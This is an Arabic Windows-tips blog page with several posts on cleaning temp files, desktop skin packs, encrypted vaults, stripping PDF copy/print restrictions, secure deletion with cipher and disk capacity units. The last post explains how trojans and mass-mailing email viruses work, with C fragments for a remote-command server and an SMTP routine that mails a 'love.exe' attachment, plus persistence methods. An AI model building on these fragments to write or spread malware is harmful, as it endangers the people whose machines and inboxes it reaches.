‏إظهار الرسائل ذات التسميات ويندوز. إظهار كافة الرسائل

أربعة أوامر مهمة لمسح المخلفات العالقة على حاسوبك وجعله سريع أكثر

السلام عليكم ورحمة الله وبركاته
بعد استعمال الحاسوب لمدة طويلة من الزمن بالتأكيد أنك ستشعر أنه لم يعد يشتغل بالسرعة التي كان عليها في الأول ،  وهذا راجع إلى عدة عوامل ،أولها كثرة تثبيت البرامج التي قد يكون بعضها غير مهم ما يسبب هذا البطأ للجهاز من خلال أخد مساحة على القرص الصلب ، وبرامج أخرى أحيانا تتطلب مواصفات كبيرة قد لا تتوفر عليها جهازك ، كما لا ننسى أيضا أنه حتى وبعد إزالة بعض البرامج يمتلأ  الريجستري بمخلفاتها ، خصوصا بعد حذفها بالطريقة الموجودة على الوندوز وعدم استعمال برامج مخصصة لذلك تقضي على أي برنامج من جذوره.


وتوجد عدة عوامل أخرى رئيسية تتسبب في بطئ الجهاز ككثرة البرامج التى تعمل مع بدا التشغيل ما يجعلها تستهلك حيزا كبيرة  من الذاكرة المؤقتة وتسبب أيضا في بطئ الإقلاع ، وفي إحدى الدروس في قسم الوندوز أعلى المدونة كنت قد شرحت طريقة تعطيلها .


عوامل أخرى رئيسية تتسبب في بطئ الحاسوب متمثلة في  مخلفات التصفح و البرامج ويمكنك في هذه الحالة تنظيفها يدويا دون استعمال أي برنامج آخر وذلك عبر بعض الأوامر ستكون محور هذه التدوينة الجديدة فتابع معي للإستفادة.


أولا في جميع الأوامر التي سنضعها تقوم بالضغط في لوحة المفاتيح على زر الوندوز + حرف R  وسوف تفتح نافذة معك بهذا الشكل ، واكتب هذه الأوامر :

عند  كتابة %temp% إضغط على ok وستفتح معك نافذة إمسح جميع الملفات الموجودة داخلها
____________________________________________________________________________

عند كتابة prefetch إضغط على ok وستفتح معك نافذة إمسح جميع الملفات الموجودة داخلها
____________________________________________________________________________

عند كتابة dllcache إضغط على ok وستفتح معك نافذة إمسح جميع الملفات الموجودة داخلها.
____________________________________________________________________
__________________________________

عند كتابةrecentإضغط على ok وستفتح معك نافذة إمسح جميع الملفات الموجودة داخلها.
__________________________________________________________________________________
ملاحظة:بعد مسح هذه المخلفات ستشعر بجهازك أخد سرعة أكبر من الأول ، ويحبد استعمال هذه الطريقة من وقت لآخر للقضاء على هذه الملفات والمخلفات المعلقة .
الجمعة، 30 مايو 2014
بواسطة Unknown
تصنيف :

تحويل شكل الويندوز 7 أو8 لشكل نظام الماك بالكامل ، بالاضافة لموقع لتحميل الآلاف من الثيمات والخلفيات العالية الجودة

هناك الكثير من الناس الذين  يصيبهم الضجر والملل ويحبون تغيير شكل نظام التشغيل الخاص بهم وتحويله إلى شكل مختلف تماما عن ما تعودوا عليه ، في الواقع،نشر سابقا بعض المواضيع التي تتحدث عن تغيير شكل النظام الويندوز إلى وجهات جميلة ومختلفة  وهنا أذكر موضوع "حول شكل ويندوز 7 الى شكل نظام اندرويد" وغيرها.موضوع اليوم يصب في  نفس الاتجاه لكن هذه المرة مع نظام لطالما أردنا الاشتغال والحصول عليه وهو نظام Mac OS X Mavericks، وكذلك سأزودكم بأهم المصادر لتحميل أجمل الخلفيات لسطح المكتب.وليس هذا فقط بل سأريكم ان شاء الله المصدر الذي يمكن ان تجدوا فيه الكثير من الثيمات والخلفية العالية الدقة لسطح المكتب.

طبعا هناك الكثير من الطرق للحصول على مظهر وواجهة نظام الماك على الويندوز لكن أفضلها وأسهلها على الإطلاق هي باستعمال Mavericks Skin Pack 3.0 .
بعد تحميل البرنامج تقوم بتسطيبه ومع عدد قليل من النقرات البسيطة ستلاحظ أن واجهة نظام الويندوز تغييرت بالكامل الى واجهة شبيهة بنظام الماك .

الموقع يوفر كذلك واجهات أخرى كواجهة أوبنتو أو الاندرويد و IOS7 وغيرها .ويمكن الوصول اليها من هنا 
البرنامج كما قلت بسيط جدا ولا يستدعي التعديل على ملفات النظام وهو متوافق مع ويندوز 7،


.
الميزة التي اعجبتي هي أيقونة سطح المكتب(الصورة أسفله) التي تستعرض من خلالها جميع ما في سطح المكتب ويمكن الوصول الى أي ملف أو برنامج تريد بسرعة وسهولة .
طبعا يمكنك إضافة أي برنامج أو ملف تريد الى هذا الشريط بالسحب والإفلات
الموقع يوفر كذلك واجهات أخرى كواجهة أوبنتو أو الاندرويد و IOS7 وغيرها .ويمكن الوصول اليها من هنا 
البرنامج كما قلت بسيط جدا ولا يستدعي التعديل على ملفات النظام وهو متوافق مع ويندوز 7، ويندوز 8 ويندوز 8.1 .

هل من مصدر أخر لتحميل مثل هذه الثيمات ؟
نعم هناك موقع أخر يوفر لك مجموعة كبيرة جدا من الثيمات والواجهات لمختلف أنظمة التشغيل وليس فقط الويندوز.الموقع بلا شك قد تكون سمعت عنه من قبل خصوصا إذا كنت مصمم :) الموقع هو deviantart.

# كيف اجد الثيمات للويندوز ؟
كما قلت سلفا الموقع يضم الكثير والكثير من الثيمات المختلفة التي تستحق ان تجربها على حاسوبك ، كما أن الموقع يوفر كذلك ثيمات للانظمة الأخرى كلينكس ونظام الماك .
وهناك ثلاث طرق للوصول لهذه الثيمات وهما :
 إما باستعمال محرك بحث الموقع باستعمال كلمة البحث مثل "Windows Skin" أو شيء من هذا القبيل .


أو من خلال الاشتراك في المجموعات المخصصة لذلك (وهنا ستحتاج الى التسجيل في الموقع) .

وللوصول لهذه المجموعات ببساطة عند النقر عن أي ثيم من هذه الثيمات ستجد في أسفل الصفحة (جانب الردود) بعض هذه المجموعات :

أو استعمال قائمة الموقع لتحديد التصنيف المخصص لهذه الثيمات ،ويمكن الوصول اليه من هذا الرابط :


# الخلفيات :
طبعا نفس الطريقة يمكن ان تسعملها لتجد الالاف من الخلفيات الجميلة والعالية الجودة .شخصيا استعمل هذا الوقع لتحميل الخلفيات التي استعملها .

طريقة التحميل من الموقع سهلة جدا وبروابط مباشرة :
رابط موقع deviantart
(يوجد ضغط على الموقع إذا لم يعمل موقع التحميل حاول لاحقا،أو قم بتحميل البرنامج في الرابط أدناه .)

رابط التحميل من موقع mediafire
الأربعاء، 28 مايو 2014
بواسطة Unknown
تصنيف :

حول شكل ويندوز 7 الى شكل نظام اندرويد

قامت Skinpack مؤخرا بطرح Android Jelly Bean skinpac للويندوز 7 ، والذي يساعدك على تحويل شكل ويندوز 7 الى سطح مكتب  اندرويد Jelly Bean حقيقي و رائع جدا .  البرنامج يعمل على جميع إصدارات ويندوز 7 كذلك على أنظمة ويندوز 32 بت وكذلك 64 بت . 

Android Jelly Bean skinpac  سهل في التتبيث فيكفي زيارتك لموقع التحميل اسفله ، ستجد ان البرنامج متاح في نسختين 64 و 32 بت ، كلما عليك إختيار النسخة  الصحيحة لحاسوبك واشرع في تتبيثها حيث بعد الإنتهاء  سيطلب منك إعادة تشغيل الحاسوب  فلا تتردد .


اما إذا كنت على ويندوز starter او basic  فيجب عليك تفعيل خاصية aero ليمكنك الإستفادة من مميزات الشكل الجديد الذي ويفره لك 
Android Jelly Bean skinpac ، اما إذا كنت تستعمل إصدارات قديمة من برنامج skinpac فوجب عليك حذفها قبل تتبيث النسخة الجديدة ، كما لاتحاول تتبيثه على ويندوز 8 لانه سيسبب في مشاكل Explorer . 

تحميل :

الموقع الرسمي للبرنامج : www.skinpacks.com
Download offline installer
X64: Download
X86: Download
by hamza kambouch

كيف تنشئ خزينتك السرية على الويندوز


لعل من أهم المشاكل التي تصادف مستعملي الحواسيب المشتركة ( حاسوب يستعمل من طرف مجموعة من الأشخاص ) هي مشكلة إخفاء بياناتهم الحساسة (صور ، فيديوهات،مستندات) عن الآخرين إما خوفا من اكتشافها أو خوفا من العبث بها .


إضافة إلى أن الجهاز المستعمل من طرف مجموعة من الأشخاص أكثر عرضة للاختراق ، لذلك وجب عليك إخفاء بياناتك عن أعين الهاكرز .
صحيح أنه يمكنك إخفاء الأقراص الصلبة أو يمكنك تشفيرها ، لكن في مثل هذه الحالات فالأمر لا ينفع.
برنامج
ToolWiz BSAFE هو أداة توفر لك الحل الناجع لكل مشاكلك مع ميزات مذهلة، لأنها تحافظ على بياناتك الخاصة آمنة ولا أحد يستطيع أن يعرف حتى عن وجودها ، يمكنك حتى استخدامها كوسيلة لتبادل الملفات بشكل آمن بين أصدقائك. كما يمكنك إنشاء العديد من الخزائن السرية مع ToolWiz BSAFE. نعم لا خوف عليك لا من طرف مستعمل آخر و لا من طرف الهاكرز إن تم اختراق جهازك لا قدر الله ، إذن هيا نلقي نظرة عن هذه الأداة وكيف تعمل :

بعد تحميل الأداة من الرابط أسفل الموضوع يمكنك تثبيت البرنامج (بصلاحيات المدير بالنسبة لمستعملي ويندوز 8 و 8.1) ثم تقوم بالضغط على I agree, Install Now
عند الانتهاء من تثبيت البرنامج تقوم بإنشاء خزينة عن طريق الضغط على
Create New Safe ثم تحدد المسار الذي تريد أن تحتفظ فيه على خزينتك السرية ، تقوم بتسميتها ثم تحدد حجمها حسب رغبتك ، ستدخل كلمة المرور ثم تضغط على create now 

ستنتظر إلى حين ينتهي البرنامج من الإنشاء ثم سيعلمك بذلك كما يتضح من الصورة .
ستجد خزينتك على شكل قرص صلب يمكنك أن تضع فيه ما تريد من بيانات (أنظر الصورة)

و عند انتهائك يمكنك إخفاء الخزينة عن طريق الضغط  على close selected safe
أما عندما تريد فتح خزينتك تفتح البرنامج ثم تضغط على  open safeثم select file لتحديد مسار الخزينة (يمكنك الإحتفاظ بها في قرص خارجي في حالة كنت تريد تبادل الملفات مع أصدقائك بشكل سري ) ثم تدخل كلمة المرور و تضغط علىopen now  ليظهر صندوقك السري من جديد 

للتحميل من الموقع الرسمي : ToolWiz BSAFE
البرنامج  يعمل على جميع نسخ الويندوز

الكاتب : hamza kabouch
الجمعة، 9 مايو 2014
بواسطة Unknown
تصنيف :

كيف تفك الحماية عن ملفات ال PDF في حالة نسيان الباسورد


قد يحصل أن تنسى باسورد ملف PDF مما لايجعلك تستطيع نسخ او طباعة محتوى الكتاب إلا بعد إدخال الباسورد ، في هذا الموضوع سأساعدك على حل هذه المشكلة ببساطة شديدة ، طبعا الطريقة لاتهم ملفات الــ PDF التي تطلب منك إدخال باسورد قبل مشاهدة المحتوى وإنما فقط الملفات التي تمنعك من نسخ محتواها او طباعته ، حيث يتطلب منك الامر إدخال الباسورد . 
وتتمثل الطريقة في الدخول اولا إلى موقع FreeMyPDF تم رفع الملف المحمي ، عن طريق النقر على choose my file تم انقر مجددا على Do it بعد عملية رفع الملف قم بتحميل النسخة الجديدة للكتاب بعد إزاحة حماية الكتابة وكذلك الطباعة عن الملف ، حيث 100% ستلاحظ انه اضحى بإمكانك نسخ محتوى الملف او طباعته كذلك . أتمنى ان تكون هذه الحيلة ستسهل الحياة على العديد من الطلاب و الموظفين ، لاتنسى مشاركة التدوينة مع اصدقائك .
الأربعاء، 7 مايو 2014
بواسطة Unknown

كيف تجعل الملفات المحذوفة من سلة المهملات غير قابلة للإسترجاع مرة اخرى بدون إستعمال برامج

طبعا عندما نقوم بحذف البيانات و إفراغ سلة مهملات الويندوز ، فهذا لايعني انك بالفعل تخلصت من تلك البيانات ذلك لانه توجد العديد من البرامج التي يمكن ان تسترجع تلك البيانات المحذوفة مرة اخرى من سلة المهملات حتى بعد حذفها ، لهذا فمن الطرق الامنة لحذف هذه البيانات هو إستعمال بعض البرامج المتخصصة مثل ERASER




غير ذلك فيمكنك  فقط ومن خلال الويندوز حذف البيانات من سلة المهملات بشكل آمن وذلك من خلال إعادة كتابة البيانات فوق البيانات المحذوفة وبذلك جعل البيانات السابقة (بياناتك المحذوفة) غير قابلة للإسترجاع مرة اخرى ، لهذا الغرض يمكنك الإستعانة بالامر cipher.exe الاخير الذي يعمل على حذف البيانات بشكل آمن سواء من القرص الصلب او كذلك من الفلاشة فيكفي ان تذهب إلى Start تم Run واكتب الامر cipher /w:c
كيف تجعل الملفات المحذوفة من سلة المهملات غير قابلة للإسترجاع مرة اخرى بدون  إستعمال برامج
 من اجل حذف البيانات الخفية في القرص الصلب :C يمكنك كذلك تغير C باي حرف لتحديد القرص الذي تود حذف البيانات منه بشكل آمن .
كيف تجعل الملفات المحذوفة من سلة المهملات غير قابلة للإسترجاع مرة اخرى بدون  إستعمال برامج


 بعد ذلك ستضهر نافدة سوداء كما هو الامر في الصورة اعلاه إنتضر إلى حين الإنتهاء من محو البيانات تم اغلق النافدة .
طبعا عند حذف البيانات من القرص C بواسطة الامر  cipher فذلك لن يحذف نظام التشغيل او يسبب له اي اضرار ففقط سيجعل البيانات المحذوفة من القرص الصلب غير قابلة للإسترجاع مرة اخرى

الخميس، 17 أبريل 2014
بواسطة Unknown
تصنيف :

لماذا الأقراص الصلبة وفلاشات الـ USB لا تظهر بسعتها الكاملة على الويندوز ؟

   كم من مرة قمت بشراء قرص صلب خارجي أو فلاش USB من فئة معينة وعندما تشبكه على حاسبك تتفاجأ بكمية مهمة من الذاكرة قد اختفت، فتنتقل من 500 جيغا مثلا إلى 465 فكيف يعقل هذا والأمر يتعلق بنسبة مهمة من الذاكرة ؟
    علما أن مصنعي القرص الصلب لم يقوموا بخداعك والمساحة التي حصلت عليها هي في الحقيقة التي قمت بشرائها، فكيف يمكن تفسير كل هذا ؟

لماذا الأقراص الصلبة وفلاشات الـ USB  لا تظهر بسعتها الكاملة على الويندوز ؟

     دعونا نقف أولا على بعض الأساسيات البديهية، التي قد يعلمها عدد كبير منكم، والتي تعتبر السر الكامن وراء المشكل. سأحاول شرحها بشكل سطحي حتى لا يختلط عليكم الأمر: إن كمية المعلومات المخزنة على الحاسب أو على أي وسيلة من وسائل التخزين، يتم قياسها بوحدة تسمى الـ "Octet" الذي يكافئ ""Byte. هذه الوحدة هي بدورها مقسمة إلى 8bits"". إذن لكي نختصر:

" 1octet=1byte=8bits "
نصل الآن إلى المضاعفات فنجد:
" 1Go = 1Gb = 1.000 Mo = 1.000.000 Ko = 1000.000.000 octets "
أين المشكل إذا؟ المشكل أن نظام تشغيل ويندوز في الحقيقة يستعمل مضاعفات أخرى (في نظام العد الثنائي)، دعوني أوضح لكم الأمر أكثر :
" 1Gio = 1.024Mio = 1024*1024Kio = 1024*1024*1024 octets = 1.073.741.824 Octets "

     هذا هو نظام العد الذي يستعمله نظام الويندوز ولكنه لا يعطيه اسمه المناسب فيطلقGo على Gio وهكذا... وهذا ما يسبب الخلط للمستخدمين. وإذا كنت ممن لا يحبون الرياضيات)أعلم أنه الحال بالنسبة للعديد منكم ;) فيكفيك أن تقوم بقسمة أي سعة تخزينية تريد على 1.07374 لتجد السعة الحقيقة التي سيظهرها نظام التشغيل ويندوز، وبالطبع كلما كانت مساحة القرص الصلب أكبر كلما لاحظت الفرق أكثر.

بواسطة Unknown
تصنيف :
PM
مرحبا...

أمن المعلومات من المواضيع المهمة في عالم الكمبيوتر وأعتقد أنة سيصبح أهم موضوع يشغل بال المهتمين

بالكمبيوتر في السنوات المقبلة والسبب تطور أساليب القرصنة وإتساع مجالها

قبل يومين تقريبا أردت تحديث نظام تشغيل لم أستخدمة منذ فترة وعندما بحثت عن التحديثات الجديدة

وجدت 60 تحديث جديد منهم 56 في الأمن؟؟ وطبعا هذا الذي تم إكتشافة في مدة سنة ونصف والذي لم يكتشف أعظم

على ماذا يدل هذا في رأيك بكل بساطة يدل على كارثة تهدد كل من يعتمد على الكمبيوتر في تجارة

أو صناعة أو معلومات والدليل قبل فترة بسيطة خسائر موقع جوجل ملايين الدولارات لأنة أعتمد

على التقنية وفتح مزاد علني على الإنترنت.

ما يهمنا من هذة المقدمة أنا الشغلة خطيرة و معقدة وحيرت الخبراء ولكن كيف

كما تعودنا دائما نبدأ من الأسهل ثم الأعقد وسيكون الشرح بالترتيب التالي:



الإختراق عن طريق ملفات التجسس (كيف تعمل ملفات التجسس)

الإختراق عن طريق فايروسات البريد(كيف تعمل فايروسات البريد)

الإختراق عن طريق ثغرات الأنظمة ( كيف تخترق الأنظمة)

الإختراق عن طريق تقنيات الإتصالات السلكية والاسلكية (إصطياد المعلومات)



أولا: ملفات التجسس

هذة الطريقة أسهل طريقة وأشهر طريقة والمعروفة عند أغلب الأعضاء

وتتم كالتالي

إرسال الخادم إلى الضحية - الإتصال بالخادم - إرسال المعلومات للخادم

ولكني سأخرج عن الروتين المتبع في شرح الإختراق وسأشرح كيف تعمل هذة البرامج

الخادم

بكل بساطة الخادم عبارة عن برنامج يفتح منفذ في الجهاز لتلقي الأوامر من برنامج خارجي لتنفيذها على الجهاز

فمثلا لفتح السيدي برنامج الإختراق يرسل معلومة إلى الخادم أي معلومة يحددها المبرمج ولتكن

0xAA

ويتم إرسالها بالطريقة التالية
send(s,(char*)0xAA,1,0);

وعندما يستقبلها الخادم يقارن ما هي التعليمة وينفذ الكود المطلوب بهذة الطريقة
DWORD cmd;
char rcv[10];
recv(s,rcv,10,0);
sscanf(rcv,"%X",&cmd);

switch(cmd)
{
......
......
case 0xAA:
mciSendString("set cdaudio door open",szbuf,255,hwnd);
break;
....
....
}

والي أريد أوصلة إن برنامج الإختراق لا ينفذ أي شيء وإنما الخادم بة كل دوال التنفيذ ولذالك تجد الخادم أكبر في الحجم

فكرة الخادم عن طريق الدوال

listen
recv


فكرة برنامج الإختراق عن طريق الدوال

connect
send


وللزيادة فكرة محرر الخادم

CreateFileMapping
MapViewOfFile


أعتقد هذا الموضوع يحتاج مثال وسأضع مثال لبرنامج تجسس إذا وافق المشرفين عن المنتدى

وثاني شيء لا نريد التعمق في هذا الموضوع لأنة من المواضع القديمة جداا

وخلونا نواكب العصر ونهتم بالجديد في عالم الهكر

ثانيا: فايروسات البريد

وهي أكثر الفايروسات إنتشارا في العالم لأنها ذكية وذاتية الإنتشار

لتشريح هذا النوع من الفايروسات لازم نأخذة من عدة نواحي

كيف ينشر نفسة و كيف يشغل نفسة بنفسة

طريقة إنتشارة

بعد ما يصمم المبرمج هذا الفايروس يقوم من مكان مجهول بإرسال هذا الفايروس إلى عدد من الإيميلات

وبعدة ينسى أمرة لأن الفايروس سيقوم بنشر نفسة

عندما يشغل أي مستخدم الفايروس بعد أن يستقبلة من البريد تحدث أمور كثيرة

أول ماظهرت هذة الفايروسات كانت تقوم بعمل واحد البحث عن عنواين البريد في الجهاز الضحية

إما أن تكون في دفتر العناوين أو في برنامج البريد وبعدها يرسل نفسة إلى هذة العناوين

وبعد فترة تطورت هذة الفايروسات وصارت طريقة عملها بهذا الشكل

يقوم الفايروس بالبحث عن العناوين في سيرفرات مشهورة مثل

سيرفر الشات أو سيرفر البريد أو قوائم البريد في بعض المواقع

ولكن كيف يقوم بالبحث وإرسال نفسة وكيف يعرف بروتوكولات البريد؟

smpt,pop3

الجواب

لو نرجع لدراست الشبكات والبروتوكولات لوجدنا موضوع مهم نظام أسماء المجالات

DNS

ينقسم هذا المجال لعدة أقسام ما يهمنا في هذا الدرس هو قسم

MX

ومعناة تبادل الرسائل

Mail Exchange

هذا القسم عبارة عن عناوين تبادل الرسائل في سيرفر البريد

لو نلاحظ موقع ياهو يحتوي سجل تبادل الرسائل على العناوين التالية

-------------------------------------------------------------------

yahoo.com MX preference = 1, mail exchanger = mx2.mail.yahoo.c
yahoo.com MX preference = 5, mail exchanger = mx4.mail.yahoo.c
yahoo.com MX preference = 1, mail exchanger = mx1.mail.yahoo.c

yahoo.com nameserver = ns1.yahoo.com
yahoo.com nameserver = ns2.yahoo.com
yahoo.com nameserver = ns3.yahoo.com
yahoo.com nameserver = ns4.yahoo.com
yahoo.com nameserver = ns5.yahoo.com
mx2.mail.yahoo.com internet address = 64.156.215.5
mx2.mail.yahoo.com internet address = 64.156.215.6
mx4.mail.yahoo.com internet address = 216.136.129.15
mx4.mail.yahoo.com internet address = 66.218.86.254
mx4.mail.yahoo.com internet address = 216.136.129.17
mx4.mail.yahoo.com internet address = 66.218.86.253
mx4.mail.yahoo.com internet address = 216.136.129.18
mx1.mail.yahoo.com internet address = 64.157.4.82
mx1.mail.yahoo.com internet address = 64.157.4.83
mx1.mail.yahoo.com internet address = 64.157.4.84
mx1.mail.yahoo.com internet address = 64.156.215.5
ns1.yahoo.com internet address = 66.218.71.63
ns2.yahoo.com internet address = 66.163.169.170
ns3.yahoo.com internet address = 217.12.4.104
ns4.yahoo.com internet address = 63.250.206.138
ns5.yahoo.com internet address = 64.58.77.85
-----------------------------------------------------------------------------------------

بمعنى أن هذة العناوين

mx1.mail.yahoo.com

mx2.mail.yahoo.com

mx3.mail.yahoo.com

mx4.mail.yahoo.com

عناوين السيرفر الذي يقوم بتبادل الرسائل

وتستطيع عرض سجل البريد لأي موقع عن طريق برنامج الدوس وبهذة الطريقة

nslookup mx yahoo.com

وبعد أن يقوم الفايروس بإظهار عنوان السيرفر يرسل نفسة

أول شيء يقوم بة بناء رسالة تحتوي على ملف مرفق بهذة الطريقة

char szRcv[MAX_PATH]

//// HELO
strcpy(szRcv,"HELO Yahoo\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

// MAIL FROM:
strcpy(szRcv,"MAIL FROM: <from@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// RCPT TO:
strcpy(szRcv,"RCPT TO: <to@yahoo.com>\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);

//// DATA
strcpy(szRcv,"DATA\r\n");
send(sct,szRcv,strlen(szRcv),0);
recv(sct,szRcv,MAX_PATH,0);
----------------------------------------
//Build Mail
ZeroMemory(szRcv,MAX_PATH);
strcpy(szRcv,"From: from@yahoo.com\r\nTo: to@yahoo.com\r\nDate: 2004\r\nSubject: Ilove You\r\n");

strcpy(BualdMsg,szRcv);
strcat(BualdMsg,"Rq-Mail: WC Mail\r\n");
strcat(BualdMsg,"MIME-Version: 1.0\r\n");
strcat(BualdMsg,"Content-Type: multipart/mixed; boundary=WC_MAIL_PaRt_BoUnDaRy_5168011\r\n\n");
strcat(BualdMsg,"This is a multi-part message in MIME format.\r\n\n");
//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type: text/plain\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: 7Bit\r\n\n");
strcat(BualdMsg,"body mail\r\n");

//
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011\r\n");
strcat(BualdMsg,"Content-Type:application/octet-stream; file=love.exe\r\n");
strcat(BualdMsg,"Content-Transfer-Encoding: base64\r\n");
strcat(BualdMsg,"Content-Disposition: attachment; filename=love.exe\r\n\n");
strcat(BualdMsg,"EXE Code");
strcat(BualdMsg,"\r\n\n");
strcat(BualdMsg,"--WC_MAIL_PaRt_BoUnDaRy_5168011--\r\n");

strcat(BualdMsg,"\r\n.\r\n");

//Send File
send(sct,BualdMsg,strlen(BualdMsg),0);
recv(sct,szRcv,MAX_PATH,0);


ولكن يجب أن تنتبة لهذة الكلمة في الكود

EXE Code

هذا الكلمة توضع مكانها شفرة الفايروس بعد التشفير

ويتم تشفير الملف بعدة طرق وقانون التشفير هو

Code<<= 8;
Code |= (indexCode & 0xff);
Code += 8;

وبعدها يتم الإرسال

هذة بكل بساطة دورة تكاثر الفايروس وإنتشارة

أما عن طريقة تشغيل نفسة فالمسألة بسيطة جدا

عن طريق

الريجستري

عن طريق ملفات التأسيس

كتابة نفسة في مقدمة البرامج

كتابة نفسة في قطاع الإقلاع في القرص الصلب



هذة الطرق في الإختراق لا تعتبر مشكلة وقد وجد لها حلول قد

تكون مفيدة والهدف من شرحها أن تكون مقدمة للدروس القادمة

التي ستتعلم بعدها أمور يجهلها الكثييير في الأمن والحماية ولا يوجد لها حلول إلى وقتنا الحالي
الأحد، 6 أبريل 2014
بواسطة Unknown
تصنيف : ,

Popular Post

Blogger templates

أقسام المدونة

قائمة المدونات الإلكترونية

تابعنا على الفيسبوك

https://www.facebook.com/pages/Hamzapro3/1492091174356542?skip_nax_wizard=true

عن موقع أوبنتو العرب

إجمالي مرات مشاهدة الصفحة

أخبار ريال مدريد

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

هل اعجبكم الموضوع لاتنسو مشاركتنا تعليقاتكم

    المتابعون

    تعديل

    we are anonymous

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تعديل

    hack world

    2

    2

    http://hamzapro3.blogspot.com/

    http://hamzapro3.blogspot.com/

    تابعنا ع الفيس بوك

    أقسام المدونة

    hamza kambouch

    القائمة البريدية

    المشاركات الشائعة

    hack

    تعديل

    يتم التشغيل بواسطة Blogger.

    http://hamzapro3.blogspot.com/

    المشاركات الشائعة

    المواضيع النشطة

    - copyright © worldprofessional -Metrominimalist- Powered by Blogger - Designed by Johanes Djogan custom blogger templates -